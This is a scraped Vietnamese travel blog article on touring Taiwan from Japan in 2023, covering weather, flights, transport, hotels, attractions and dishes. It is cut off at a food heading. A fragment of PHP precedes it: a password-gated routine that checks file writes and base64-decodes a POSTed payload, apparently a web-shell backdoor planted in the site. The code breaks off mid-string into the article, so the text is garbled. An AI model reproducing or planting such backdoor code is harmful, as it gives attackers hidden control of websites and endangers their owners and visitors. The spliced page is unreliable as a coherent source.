function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Khám phá tour du lịch Đài Loan từ Nhật Bản 2023 mới nhất!

Khám phá tour du lịch Đài Loan từ Nhật Bản 2023 mới nhất!

27/05/2023 LamThanhHien

Du lịch Đài Loan từ Nhật Bản 2023 là chuyến đi cực kì đáng mong đợi trong năm nay. Nói đến quốc đảo Đài Loan thì phải nhắc đến những danh lam thắng cảnh, các công viên giải trí với đa dạng các chủ đề và các di tích lịch sử. Nhưng bạn đã biết mình cần chuẩn bị những gì cho chuyến du lịch Đài Loan từ Nhật Bản 2023 sắp tới chưa? Đừng lo bài viết sau đây của Đi Để Đến sẽ “gỡ rối” những thắc mắc của bạn.

TỔNG QUAN VỀ ĐÀI LOAN

Đài Loan là một quốc đảo có diện tích khá nhỏ, nằm ở phía Đông Nam của Trung Quốc. Dân số chỉ có khoảng 23 triệu người sinh sống (số liệu năm 2020). Đài Loan còn có một biệt danh mà ít người biết đến đó chính là Formosa.

Du lịch Đài Loan từ Nhật Bản 2023 - Tổng quan về Đài Loan

Đài Loan là một quốc đảo có diện tích khá nhỏ, nằm ở phía Đông Nam của Trung Quốc

Đài Loan còn được biết đến với nền văn hóa đa dạng và kinh tế phát triển vượt bậc. Đến với Đài Loan, khách du lịch Đài Loan từ Nhật Bản 2023 có thể đến thăm các thành phố lớn như Đài Bắc, Đài Trung và Đài Nam,… Nơi có những địa điểm tham quan vô cùng nổi tiếng như: Chợ đêm Đài Bắc, Tòa tháp Đài Bắc 101, Bảo tàng Quốc gia Đài Loan, Các công viên giải trí theo chủ đề,….

Ngoài ra, Đài Loan cũng là một trung tâm sản xuất và công nghệ, với các sản phẩm về các thiết bị điện tử và mạng máy tính truyền thông. Ngoài những điều đặc biệt kể trên thì du lịch biển cũng là một trong những phần không thể thiếu trong chuyến du lịch Đài Loan từ Nhật Bản 2023 của bạn. Nơi khách du lịch Đài Loan từ Nhật Bản 2023 có thể thỏa thích tham gia các hoạt động thể thao trên biển và thưởng thức ẩm thực địa phương vô cùng đặc biệt.

>>>Xem thêm: Địa điểm du lịch Đài Loan – Khám phá quốc đảo xinh đẹp

ĐI DU LỊCH ĐÀI LOAN TỪ NHẬT BẢN 2023 VÀO THỜI GIAN NÀO LÀ HỢP LÝ

Đài Loan mang khí hậu cận nhiệt đới và nhiệt đới nên thời tiết có nắng ấm quanh năm. Do đó khách du lịch Đài Loan từ Nhật Bản 2023 có thể đi du lịch vào bất kỳ thời điểm nào tùy vào nhu cầu của bạn. Tuy vậy, thời điểm thích hợp nhất để thực hiện chuyến du lịch Đài Loan từ Nhật Bản 2023 là vào mùa thu từ tháng 9 đến tháng 11. Đây là thời điểm đẹp nhất trong năm để bạn đến thăm Đài Loan.

Vào mùa thu khí hậu có phần mát mẻ hơn các mùa khác, dễ chịu và không quá lạnh. Nên rất thuận tiện để khách du lịch Đài Loan từ Nhật Bản 2023 có thể thoải mái thưởng thức những cảnh đẹp, lượn lờ ở những con phố cổ, mua sắm và vui chơi tại đây.

CÁCH ĐI TỪ NHẬT BẢN ĐẾN ĐÀI LOAN

1. Di chuyển đến Đài Loan

Hầu hết các khách du lịch Đài Loan từ Nhật Bản 2023 đều chọn di chuyển bằng máy bay. Vì đi bằng máy bay sẽ giúp bạn tiết kiệm được rất nhiều thời gian và vô cùng thuận tiện.

Du lịch Đài Loan từ Nhật Bản 2023 - Di chuyển từ Nhật Bản đến Đài Loan

Hãng hàng không quốc gia của Nhật Bản – Japan Airlines có khai thác các chuyến bay hàng ngày đến Đài Loan

Các hãng hàng không như Japan Airlines, All Nippon Airways, Eva Air và China Airlines đều có chuyến bay từ Tokyo, Osaka hoặc Fukuoka đến Đài Loan. Thời gian bay khoảng từ 2 đến 4 giờ tùy theo địa điểm khởi hành. Tốt nhất là bạn nên đặt vé máy bay trước từ 1 đến 2 tháng để có mức giá phù hợp, tránh đặt vé quá sát ngày đi vì khi đó giá sẽ rất cao.

Mùa du lịch tại Đài Loan bước vào thời kỳ cao điểm là từ tháng 7 đến tháng 10. Nếu khách du lịch Đài Loan từ Nhật Bản 2023 đặt vé máy bay vào thời điểm này thì mức phí sẽ cao. Còn mùa thấp điểm là từ tháng 11 đến tháng 3. Nếu khách du lịch Đài Loan từ Nhật Bản 2023 đi vào thời điểm này thì giá máy bay sẽ rẻ.

2. Di chuyển trong Đài Loan

Đài Loan sở hữu một hệ thống giao thông công cộng cực kỳ phát triển và rất tiện lợi để di chuyển ở mỗi điểm. Khách tour du lịch Đài Loan từ Nhật Bản 2023 có thể lựa chọn di chuyển bằng nhiều hình thức khác nhau. Bạn có thể dựa vào địa điểm tham quan để tìm trên bảng chỉ dẫn đến ga tàu. Bạn có thể di chuyển bằng tàu điện ngầm MRT, tàu cao tốc THSR hoặc xe bus đều được.

Du lịch Đài Loan từ Nhật Bản 2023 - Di chuyển trong Đài Loan

Đài Loan sở hữu một hệ thống giao thông công cộng cực kỳ phát triển và rất tiện lợi để di chuyển ở mỗi điểm

Tại Đài Loan người ta dùng 2 loại thẻ phổ biến để thanh toán mỗi khi đi tàu đó là vé lẻ (Token) và thẻ Easy Card. Khách du lịch Đài Loan từ Nhật Bản 2023 nên mua thẻ Easy Card nếu bạn có dự định ở Đài Loan dài ngày. Vì mỗi lần đi tàu hoặc xe bus bạn chỉ cần quét thẻ là xong, vừa nhanh chóng vừa tiện lợi.

>>>Xem thêm: Cẩm nang du lịch Đài Loan 2023 tự túc từ A – Z

CÁC KHÁCH SẠN ĐẸP TẠI ĐÀI LOAN

1. Tempus Hotel Taichung

Tempus Hotel Taichung là khách sạn 5 sao sang trọng nằm ở trung tâm Đài Trung, Đài Loan. Khách sạn có 323 phòng nghỉ và dãy phòng được trang trí tao nhã. Mỗi phòng đều có tiện nghi hiện đại và tầm nhìn tuyệt đẹp ra quang cảnh thành phố. Đây là một trong những khách sạn đẹp và sang trọng dành cho du khách tour du lịch Đài Loan từ Nhật Bản 2023 tham khảo.

Du lịch Đài Loan từ Nhật Bản 2023 - Tempus Hotel Taichung

Tempus Hotel Taichung là một sự lựa chọn tuyệt vời cho du khách du lịch Đài Loan từ Nhật Bản 2023 đang tìm kiếm nơi lưu trú sang trọng tại Đài Trung

Khách sạn có nhiều lựa chọn ăn uống, bao gồm hai nhà hàng, quầy bar, sảnh khách và tiệm bánh. Khách du lịch Đài Loan từ Nhật Bản 2023 có thể thưởng thức các món ăn ngon của Trung Quốc tại nhà hàng Jade Dragon hoặc các món ăn quốc tế tại nhà hàng Le Chinois. Quầy bar Le Bar của khách sạn phục vụ đủ loại cocktail và rượu vang trong khi Lobby Lounge mang đến bầu không khí thư giãn cho bữa trà chiều.

Tempus Hotel Taichung còn có phòng gym, hồ bơi ngoài trời, phòng xông hơi khô và spa. Mang đến cho du khách tour du lịch Đài Loan từ Nhật Bản 2023 nhiều lựa chọn. Khách sạn cũng có 13 phòng họp và phòng khiêu vũ lớn, khiến nơi đây trở thành địa điểm lý tưởng cho các sự kiện và hội nghị kinh doanh.

Nhìn chung, Tempus Hotel Taichung là một sự lựa chọn tuyệt vời cho du khách du lịch Đài Loan từ Nhật Bản 2023 đang tìm kiếm nơi lưu trú sang trọng tại Đài Trung, với vị trí thuận tiện và hàng loạt tiện nghi vừa nêu.

2. Humble House Taipei

Humble House Taipei là một khách sạn 5 sao hiện đại và đầy phong cách ở trung tâm Đài Bắc, Đài Loan. Khách sạn có 235 phòng nghỉ rộng rãi với cửa sổ kính trong suốt từ trần đến sàn cho tầm nhìn tuyệt đẹp ra quang cảnh thành phố.

Du lịch Đài Loan từ Nhật Bản 2023 - Humble House Taipei

Humble House Taipei là một khách sạn 5 sao hiện đại và đầy phong cách ở trung tâm Đài Bắc

Khách sạn còn có bố trí một nhà hàng trên tầng mái là La Farfalla, nơi phục vụ ẩm thực Ý với tầm nhìn ngoạn mục ra tòa nhà Đài Bắc 101 và đường chân trời của thành phố. Du khách tour du lịch Đài Loan từ Nhật Bản 2023 cũng có thể thưởng thức ẩm thực Nhật Bản tại nhà hàng A Cut của khách sạn hoặc thưởng thức đồ uống và đồ ăn nhẹ tại Lobby Lounge.

Điều làm nên sự khác biệt của Humble House Taipei là cam kết về tính bền vững và thân thiện với môi trường. Khách sạn đã thực hiện một số biện pháp để giảm lượng khí thải carbon, chẳng hạn như sử dụng các nguồn năng lượng tái tạo và thực hiện các biện pháp tiết kiệm nước.

Humble House Taipei mang đến trải nghiệm độc đáo và sang trọng cho những du khách tour du lịch Đài Loan từ Nhật Bản 2023 đang tìm kiếm một kỳ nghỉ đầy phong cách tại thành phố Đài Bắc.

>>>Xem thêm: Cẩm nang du lịch Đài Loan tiết kiệm

3. The Old England Manor

The Old England Manor là một khách sạn 5 sao quyến rũ nằm ở vùng núi tuyệt đẹp của tỉnh Nam Đầu, Đài Loan. Khách sạn được thiết kế theo phong cách Tudor kiểu Anh và có 88 phòng nghỉ, mỗi phòng đều có lối trang trí và đặc điểm riêng.

Du lịch Đài Loan từ Nhật Bản 2023 - The Old England Manor

Vị trí và bầu không khí độc đáo của The Old England Manor, mang đến một lối thoát thanh bình và yên tĩnh khỏi sự hối hả và nhộn nhịp của cuộc sống thành phố

Nhà hàng Churchill của khách sạn phục vụ các món ăn quốc tế với phong cách Anh và Windsor Lounge, nơi mang đến bầu không khí ấm cúng để thưởng thức trà và đồ ăn nhẹ. Du khách tour du lịch Đài Loan từ Nhật Bản 2023 cũng có thể thưởng thức trà chiều kiểu Anh truyền thống trong phòng trà của khách sạn.

The Old England Manor cũng có nhiều tiện nghi để du khách tour du lịch Đài Loan từ Nhật Bản 2023 thư giãn và nghỉ ngơi như spa, phòng gym và hồ bơi trong nhà. Khách sạn còn có khu sân vườn và sân hiên tuyệt đẹp để du khách thưởng ngoạn vẻ đẹp thiên nhiên xung quanh.

Vị trí và bầu không khí độc đáo của The Old England Manor, mang đến một lối thoát thanh bình và yên tĩnh khỏi sự hối hả và nhộn nhịp của cuộc sống thành phố. Khách sạn nằm gần một số điểm tham quan nổi tiếng, bao gồm Hồ Nhật Nguyệt và Trang trại Cingjing. Khiến nơi đây trở thành một địa điểm lý tưởng để khám phá vẻ đẹp tự nhiên của Đài Loan.

CÁC ĐỊA ĐIỂM THAM QUAN MÀ KHÁCH DU LỊCH ĐÀI LOAN TỪ NHẬT BẢN 2023 KHÔNG NÊN BỎ QUA

1. Tháp Đài Bắc 101

Tòa tháp Taipei 101 là một trong những công trình kiến trúc nổi bật tại Đài Loan và nổi tiếng trên thế giới. Tòa tháp này được xây dựng và hoàn thành trong 5 năm, từ 1999 đến 2004. Tòa tháp có chiều cao 508m, tòa Đài Bắc 101 từng giữ kỷ lục là tòa nhà cao nhất trên thế giới cho đến năm 2010.

Du lịch Đài Loan từ Nhật Bản 2023 - Tháp Đài Bắc 101

Tòa tháp Taipei 101 là một trong những công trình kiến trúc nổi bật tại Đài Loan và nổi tiếng trên thế giới

Tòa tháp được thiết kế như là một cây tre vươn mình đến đỉnh cao. Nó mang ý nghĩa rằng Đài Loan sẽ ngày càng phát triển và chạm đến đỉnh cao. Ngoài những giá trị về kiến trúc thì tòa tháp Đài Bắc 101 còn có một hệ thống thang máy nhanh nhất thế giới. Nó chỉ mất khoảng 37s để đưa chúng ta lên đến tầng 101.

Đây là một địa điểm vô cùng hấp dẫn mà khách du lịch Đài Loan từ Nhật Bản 2023 không nên bỏ qua. Đây là cơ hội tuyệt vời để bạn có thể chiêm ngưỡng vẻ đẹp của 1 trong 7 kỳ quan thế giới mới. Cùng với đó khách du lịch Đài Loan từ Nhật Bản 2023 có thể tận hưởng các tiện ích về dịch vụ tại đây.

>>>Xem thêm: [Cập nhật mới nhất] Các chuyến bay charter từ Đài Loan về Việt Nam

2. Trung Tâm Nghệ Thuật Truyền Thống Quốc Gia

Trung Tâm Nghệ Thuật Truyền Thống Quốc Gia là một trung tâm nghệ thuật quan trọng của Đài Loan. Trung tâm này được thành lập nhằm bảo tồn và phát triển các nghệ thuật truyền thống của Đài Loan. Một trong số đó có thể kể đến là: Múa rối, hát bội, và nhiều hình thức nghệ thuật khác.

Du lịch Đài Loan từ Nhật Bản 2023 - Trung Tâm Nghệ Thuật Truyền Thống Quốc Gia

Trung Tâm Nghệ Thuật Truyền Thống Quốc Gia là trung tâm nghệ thuật lớn nhất trên thế giới

Trung Tâm Nghệ Thuật Truyền Thống Quốc Gia có nhiều phòng trưng bày và sân khấu để giới thiệu và trình diễn các buổi biểu diễn nghệ thuật truyền thống hay các buổi hòa nhạc. Ngoài ra, trung tâm còn có các lớp học và chương trình đào tạo để giúp truyền lại kiến thức và kỹ năng về nghệ thuật truyền thống cho các thế hệ trẻ.

Các buổi biểu diễn tại Trung Tâm Nghệ Thuật Truyền Thống Quốc Gia thường được tổ chức vào cuối tuần hoặc trong các dịp lễ hội quan trọng. Du khách đi du lịch Đài Loan từ Nhật Bản 2023 có thể tham gia để thưởng thức các màn biểu diễn độc đáo và tìm hiểu về nghệ thuật truyền thống của Đài Loan.

Trung Tâm Nghệ Thuật Truyền Thống Quốc Gia là một điểm đến tuyệt vời cho những ai yêu thích các bộ môn nghệ thuật và muốn tìm hiểu về nền văn hóa truyền thống của Đài Loan. Với các buổi biểu diễn độc đáo và các chương trình đào tạo, khách du lịch Đài Loan từ Nhật Bản 2023 hẳn sẽ có những trải nghiệm thú vị tại Trung Tâm Nghệ Thuật Truyền Thống Quốc Gia.

3. Thủy Cung Và Bảo Tàng Sinh Vật Biển Kenting

Thủy Cung Và Bảo Tàng Sinh Vật Biển Quốc Gia Kenting nằm trong Công viên Quốc gia Kenting ở Đài Loan. Đây là nơi sinh sống của nhiều loài sinh vật biển như cá, rùa biển hay những rạn san hô đầy sắc màu.

Du lịch Đài Loan từ Nhật Bản 2023 - Thủy Cung Và Bảo Tàng Sinh Vật Biển Kenting

Thủy cung còn thiết kế một lối đi xuyên qua thủy cung cho phép du khách đi du lịch Đài Loan từ Nhật Bản 2023 có thể quan sát cận cảnh các sinh vật biển

Du khách đi du lịch Đài Loan từ Nhật Bản 2023 có thể tham gia các triển lãm. Để tìm hiểu những thông tin về các loài động vật khác nhau sống ở vùng biển xung quanh Đài Loan. Đặc biệt, thủy cung còn thiết kế một lối đi độc đáo xuyên qua thủy cung cho phép du khách đi du lịch Đài Loan từ Nhật Bản 2023 có thể quan sát cận cảnh các sinh vật biển.

Bảo tàng sinh vật biển và thủy cung quốc gia Kenting không chỉ nổi tiếng tại Đài Loan, mà nó còn là công trình ấn tượng bậc nhất châu Á. Nơi đây vẫn còn lưu giữ hơn 15.000 sinh vật biển thuộc hơn 500 loài khác nhau. Trong đó bao gồm cả những loài sinh vật quý hiếm và có nguy cơ tuyệt chủng đã được cứu hộ và phục hồi.

Điều đặc biệt đáng quan tâm của Bảo tàng Sinh vật biển và Thủy cung Quốc gia Kenting là đường hầm dưới nước dài 81m. Con đường này sẽ mang đến cho khách du lịch Đài Loan từ Nhật Bản 2023 một trải nghiệm đầy sống động.

>>>Xem thêm: Thưởng thức tuyết trắng xóa Đài Loan cùng vé rẻ Vietnam Airlines tháng 12

4. Khu Tham Quan Taipingshan National Forest

Khu tham quan Taipingshan National Forest nằm ở phía Đông Bắc đảo và được phủ xanh bởi những cánh rừng rậm và đồi núi chập trùng. Khu vực này có khí hậu mát mẻ và xanh mát quanh năm. Đây sẽ là nơi lý tưởng cho những khách du lịch Đài Loan từ Nhật Bản 2023 muốn tìm kiếm một kỳ nghỉ bình yên và hòa mình với thiên nhiên.

Du lịch Đài Loan từ Nhật Bản 2023 - Khu Tham Quan Taipingshan National Forest

Khu tham quan Taipingshan National Forest nằm ở phía Đông Bắc đảo và được phủ xanh bởi những cánh rừng rậm và đồi núi chập trùng

Tại khu tham quan Taipingshan National Forest có rất nhiều điểm đến hấp dẫn cho du khách du lịch Đài Loan từ Nhật Bản 2023 lựa chọn. Bao gồm thác nước, đồi chè và những con đường đi bộ xuyên qua rừng. Du khách du lịch Đài Loan từ Nhật Bản 2023 có thể ung dung tản bộ và ngắm cảnh, tham quan các trang trại chè và tham gia các hoạt động như câu cá cũng rất tuyệt vời.

Ngoài ra, khu vực này còn có một số khách sạn và khu nghỉ dưỡng cực đẹp để du khách du lịch Đài Loan từ Nhật Bản 2023 lưu trú và tận hưởng kỳ nghỉ tuyệt vời giữa thiên nhiên bao la. Không những là một điểm du lịch nổi tiếng, Taipingshan National Forest còn là một nơi hoàn hảo để bạn có thể tìm lại sự cân bằng trong cuộc sống bận rộn như hiện nay.

5. Công Viên Janfusun Fancyworld

Công viên Janfusun Fancyworld là một công viên giải trí tọa lạc tại thị trấn Gukeng, huyện Yunlin. Công viên có vô số các trò chơi dành cho khách du lịch Đài Loan từ Nhật Bản 2023 ở mọi lứa tuổi. Các trò chơi nổi bật tại Công viên Janfusun Fancyworld là tàu lượn siêu tốc, trò chơi trượt nước và nhiều khu vực được bố trí theo đa dạng các chủ đề.

Du lịch Đài Loan từ Nhật Bản 2023 - Công Viên Janfusun Fancyworld

Các trò chơi nổi bật tại Công viên Janfusun Fancyworld là tàu lượn siêu tốc, trò chơi trượt nước và nhiều khu vực được bố trí theo đa dạng các chủ đề

Một trong những điểm thu hút du khách nhất của công viên này là tàu lượn siêu tốc Gravity Max. Trò chơi này giữ kỷ lục là tàu lượn đầu tiên trên thế giới có phần “nghiêng” khiến nhiều du khách “tái mặt”. Người chơi sẽ bị nghiêng về phía trước 90 độ trước khi rơi tự do xuống theo phương thẳng đứng. Các trò chơi khác tại công viên cũng khá thú vị như Fireball, tàu lượn vòng đạt tốc độ lên tới 80 km/h và Skyline.

Ngoài các trò chơi nêu trên, Công Viên Janfusun Fancyworld còn chia ra những khu vực theo các chủ đề như Fantasy World – được thiết kế theo kiểu những tòa lâu đài thời trung cổ. Hay Happy World, hướng đến đối tượng là trẻ em với các trò chơi nhẹ nhàng và hấp dẫn.

Công Viên Janfusun Fancyworld là một điểm đến mà nếu ai yêu thích cảm giác mạnh trong tour du lịch Đài Loan từ Nhật Bản 2023 không nên bỏ lỡ. Với vô vàn những trò chơi thú vị, các chủ đề thú vị, nơi đây chắc chắn sẽ mang đến những trải nghiệm độc đáo cho du khách.

>>>Xem thêm: Vi vu Đài Loan với loạt vé máy bay giá rẻ tháng 11

6. Công viên giải trí Leofoo Village

Công viên giải trí Leofoo Village tọa lạc tại thị trấn Guanxi, huyện Hsinchu, Đài Loan. Công viên có diện tích lên đến 100 hecta và có nhiều trò chơi cũng như điểm tham quan kỳ thú dành cho du khách tour du lịch Đài Loan từ Nhật Bản 2023 đến vui chơi và trải nghiệm.

Du lịch Đài Loan từ Nhật Bản 2023 - Công viên giải trí Leofoo Village

Cũng giống với Công Viên Janfusun Fancyworld, điểm thu hút của Công viên Giải trí Leofoo Village là tàu lượn siêu tốc

Cũng giống với Công Viên Janfusun Fancyworld, điểm thu hút của Công viên Giải trí Leofoo Village là tàu lượn siêu tốc. Công viên có một số tàu lượn cảm giác mạnh, nổi bật nhất là Screaming Condor – tàu lượn cao và nhanh nhất châu Á, với vận tốc lên tới 115 km/h.

Công viên được chia thành bốn khu vực theo bốn chủ đề: Nam Thái Bình Dương, Miền Tây hoang dã, Safari Châu Phi và Ả Rập cổ đại. Tại mỗi khu vực đều được bố trí các trò chơi có liên quan đến chủ đề của khu đó. Du khách tour du lịch Đài Loan từ Nhật Bản 2023 cũng có thể tham gia trò chơi máng trượt bằng gỗ, đu quay và còn rất nhiều điểm vui chơi thú vị khác đang chờ đợi bạn.

Chưa dừng lại ở đó, Công viên Giải trí Làng Leofoo còn có hẳn một vườn thú. Đây là “nhà” của hơn 70 loài động vật. Du khách tour du lịch Đài Loan từ Nhật Bản 2023 sẽ có cơ hội được nhìn cận cảnh về môi trường sống cũng như các thói quen thường ngày của các loài động vật này.

7. Hualien Farglory Ocean Park

Đã đến với quốc đảo Đài Loan thì không thể không nhắc đến các công viên mang chủ đề đại dương. Một trong số đó phải kể đến Hualien Farglory Ocean Park. Đây là một công viên giải trí mang phong cách đại dương nổi tiếng nằm ở quận Hoa Liên mà du khách tour du lịch Đài Loan từ Nhật Bản 2023 không thể bỏ qua.

Du lịch Đài Loan từ Nhật Bản 2023 - Hualien Farglory Ocean Park

Điểm thu hút du khách nhất tại Hualien Farglory Ocean Park là thủy cung “siêu to khổng lồ”

Điểm thu hút du khách nhất tại Hualien Farglory Ocean Park là thủy cung “siêu to khổng lồ”. Công viên có một bể lớn chứa nhiều loại sinh vật biển. Ngoài ra, Công viên Đại dương Farglory Hoa Liên cũng có cung cấp một số trò chơi và điểm tham quan tuyệt đẹp.

Các trò chơi đáng chú ý khác như là: Flying Over The Rainforest, đây là một trò chơi thực tế ảo đưa du khách tour tour du lịch Đài Loan từ Nhật Bản 2023 vào cuộc phiêu lưu xuyên rừng sâu. Và trò chơi Sea Dragon, trò chơi trên nước mô phỏng những cuộc viễn chinh của các thủy thủ cừ khôi khi đi qua vùng biển động.

Công viên Đại dương Farglory Hoa Liên là một điểm đến hoàn hảo cho những gia đình và bất kỳ du khách nào có niềm say mê với các loài sinh vật biển. Tại khu vực thủy cung thường diễn ra các buổi trình diễn động vật. Nơi đây cung cấp nhiều hoạt động và thông tin hữu ích mà du khách tour tour du lịch Đài Loan từ Nhật Bản 2023 có thể chưa từng biết.

>>>Xem thêm: Săn vé liền tay, bay ngay Đài Loan cùng Vietjet giá chỉ từ 0 đồng

8. Công Viên Địa Chất Dã Liễu

Công viên địa chất Dã Liễu là một công viên địa chất nằm ở quận Vạn Lý, thành phố Tân Bắc. Công viên nổi tiếng với sự hình thành và phát triển của đá vô cùng đặc biệt, nó được tạo ra bởi sự xói mòn biển và phong hóa trong hàng ngàn năm.

Du lịch Đài Loan từ Nhật Bản 2023 - Công Viên Địa Chất Dã Liễu

Công viên nổi tiếng với sự hình thành và phát triển của đá vô cùng đặc biệt

Ba hình dạng phổ biến nhất trong công viên địa chất Dã Liễu là: Đầu của Nữ hoàng, Giày Tiên và Đá Nấm. Công viên địa chất Dã Liễu là một địa điểm du lịch thiên nhiên nổi tiếng bậc nhất tại Đài Loan. Không chỉ thu hút du khách từ tour du lịch Đài Loan từ Nhật Bản 2023, mà còn thu hút du khách từ khắp nơi trên thế giới.

Công viên địa chất Dã Liễu có diện tích khoảng 1,7 km2 và nằm trên một mỏm đá có tầm nhìn phóng ra biển. Công viên là nơi có nhiều loại đá khác nhau, bao gồm đá hình nấm, đá tổ ong và ổ gà. Các loại đá này được hình thành do xói mòn biển và phong hóa. Những mõm đá ở đây được đặt tên theo sự giống nhau của chúng với hình thù của đá sau khi bị phong hóa hay bào mòn. Chẳng hạn như Đầu của Nữ hoàng nổi tiếng, hay đá Nấm tiên,…

Bên cạnh những khối đá độc đáo, công viên còn là môi trường sống của nhiều loại thực vật và động vật như: Mòng biển, cua và nhím biển. Du khách tour tour du lịch Đài Loan từ Nhật Bản 2023 có thể quan sát sự đa dạng sinh học phong phú nơi đây bằng cách khám phá các hồ thủy triều và bờ biển đá.

9. Chợ Đêm Đài Bắc

Chợ đêm Đài Bắc (Taipei Night Market), là nơi diễn ra hoạt động giao thương nhộn nhịp của của người dân địa phương và khách du lịch. Nếu khách tour du lịch Đài Loan từ Nhật Bản 2023 đang tìm kiếm một bầu không khí mới mẻ, náo nhiệt tại Đài Bắc thì đừng bỏ qua khu chợ nổi tiếng này nhé!

Du lịch Đài Loan từ Nhật Bản 2023 - Chợ Đêm Đài Bắc

Một trong những hoạt động thú vị của Chợ đêm Đài Bắc là khám phá ẩm thực đường phố

Một trong những hoạt động thú vị của Chợ đêm Đài Bắc là khám phá ẩm thực đường phố. Du khách tour du lịch Đài Loan từ Nhật Bản 2023 có thể tìm thấy vô số các món ngon bản địa như: Đậu phụ thối, trứng tráng hàu, trà sữa trân châu, mì bò,….

Ngoài ẩm thực đặc sắc, chợ đêm Đài Bắc còn là một “thiên đường mua sắm” chính hiệu. Du khách tour du lịch Đài Loan từ Nhật Bản 2023 có thể tìm thấy các cửa hàng quần áo, phụ kiện đến đồ điện tử hay quà lưu niệm. Tại chợ đêm Đài Bắc cũng thường có những người biểu diễn đường phố, sẽ thật tuyệt vời nếu bạn là một du khách có niềm yêu thích với âm nhạc.

Chợ đêm Đài Bắc là điểm dừng chân không thể thiếu trong danh sách những điểm đến vui vẻ và thú vị ở Đài Bắc. Từ những món ăn đường phố đa dạng, những khu mua sắm và giải trí sầm uất. Nơi đây chắc chắn sẽ mang đến cho bạn một trải nghiệm độc đáo cho du khách tour du lịch Đài Loan từ Nhật Bản 2023.

>>>Xem thêm: Visa đi Đài Loan du lịch

10. Bảo Tàng Ảo Ảnh

Bảo tàng ảo ảnh là một điểm đến du lịch đặc biệt tại Đài Loan. Đến đây, khách tour du lịch Đài Loan từ Nhật Bản 2023 có thể trải nghiệm và cho ra những bức ảnh 3D độc đáo và ấn tượng. Bảo tàng này đã thu hút rất nhiều khách du lịch trong và ngoài nước đến tham quan sự độc đáo và thu hút này.

Du lịch Đài Loan từ Nhật Bản 2023 - Bảo Tàng Ảo Ảnh

Khách du lịch tour du lịch Đài Loan từ Nhật Bản 2023 có thể thỏa thích tạo những khoảnh khắc độc đáo với những bức ảnh 3D

Tại bảo tàng ảo ảnh, khách du lịch tour du lịch Đài Loan từ Nhật Bản 2023 có thể thỏa thích tạo những khoảnh khắc độc đáo với những bức ảnh 3D. Những tấm gương được bố trí để tạo ra hiệu ứng 3D khi chụp ở các góc độ khác nhau. Du khách tour du lịch Đài Loan từ Nhật Bản 2023 có thể tạo ra những dáng tùy thích với các bức ảnh để tạo ra những khoảnh khắc đáng nhớ nhất.

Bên cạnh đó,tại đây cũng có một số phòng trưng bày khác. Nơi khách tour du lịch Đài Loan từ Nhật Bản 2023 có thể tham quan các bức ảnh động về các chủ đề khác nhau. Tất cả các bức ảnh đều rất độc đáo và vô cùng sáng tạo, đem lại cho du khách tour du lịch Đài Loan từ Nhật Bản 2023 những trải nghiệm tuyệt vời.

Bảo tàng ảo ảnh là một điểm đến tuyệt vời cho những ai yêu thích sự sáng tạo và tìm kiếm một nguồn cảm hứng mới lạ tại Đài Loan. Với vô số các bức ảnh 3D độc đáo và các chủ đề trưng bày rất phong phú, du khách tour du lịch Đài Loan từ Nhật Bản 2023 hẳn sẽ rất yêu thích địa điểm dừng chân kế tiếp này.

11. Khu Giải Trí Rừng Quốc Gia Dasyueshan

Khu giải trí Rừng Quốc gia Dasyueshan nổi tiếng với các hoạt động thư giãn ngoài trời như: Picnic, leo núi và ngắm lá chuyển sang sắc đỏ đẹp mắt vào mùa thu. Đây là một hoạt động được rất nhiều du khách tour du lịch Đài Loan từ Nhật Bản 2023 mong đợi bởi cảnh sắc tuyệt như tranh vẽ của những cánh rừng phong đỏ xen vào những cành lá vàng đầy mê hoặc.

Du lịch Đài Loan từ Nhật Bản 2023 - Khu Giải Trí Rừng Quốc Gia Dasyueshan

Khu giải trí Rừng Quốc gia Dasyueshan sẽ là một cung đường đầy hấp dẫn cho khách tour du lịch Đài Loan từ Nhật Bản 2023 thích đi bộ đường dài

Khu giải trí Rừng Quốc gia Dasyueshan sẽ là một cung đường đầy hấp dẫn cho khách tour du lịch Đài Loan từ Nhật Bản 2023 thích đi bộ đường dài. Trên đường đi, bạn sẽ dễ dàng bắt gặp những vẻ đẹp thiên nhiên của các thác nước, suối, và hồ nước trong rừng.

Ngoài ra, khu giải trí Rừng Quốc gia Dasyueshan còn có nhiều loại động vật quý hiếm sinh sống và một số loài động vật đang có nguy cơ bị tuyệt chủng. Du khách tour du lịch Đài Loan từ Nhật Bản 2023 có thể tham gia các chuyến tham quan tìm hiểu về những loài động vật này.

>>>Xem thêm: Tour du lịch Đài Loan 02-09: Đào Viên – Đài Bắc – Đài Trung 4N4Đ

NÊN ĂN GÌ TRONG TOUR DU LỊCH ĐÀI LOAN TỪ NHẬT BẢN 2023?

1. Cơm Thịt Kho Lu Rou Fan

Cơm thịt kho Lu Rou Fan là một trong những món ăn nổi tiếng nhất của Đài Loan. Món ăn này gồm những miếng thịt ba chỉ mềm, hơi dẻo được nấu trong nước sốt caramel đậm đà. Sau đó. thịt sẽ được ăn kèm cùng một bát cơm nóng là “chuẩn bài”.

Du lịch Đài Loan từ Nhật Bản 2023 - Cơm Thịt Kho Lu Rou Fan

Cơm thịt kho Lu Rou Fan là một trong những món ăn nổi tiếng nhất của Đài Loan

Món ăn thường được nấu cùng với các loại thảo mộc và gia vị như: Nước mắm, tỏi, gừng, hồi,… Giúp thịt lợn có hương vị mặn và hơi ngọt nhẹ vô cùng bắt vị. Thịt lợn được hầm trong nước sốt caramel sền sệt cho đến khi mềm và dễ dàng xé ra bằng nĩa.

Cơm thịt Kho Lu Rou Fan là một món ăn ngon của Đài Loan mà du khách tour du lịch Đài Loan từ Nhật Bản 2023 không nên bỏ qua. Tuy nó có phần đơn giản nhưng lại ăn rất ngon miệng, dễ làm và có thể tùy chỉnh theo khẩu vị của từng người. Sự kết hợp hài hòa giữa thịt ba chỉ mềm và cơm nóng sẽ tạo nên một bữa ăn hoàn hảo đến từng miếng ăn.

2. Bánh Bao Súp Xiao Long Bao

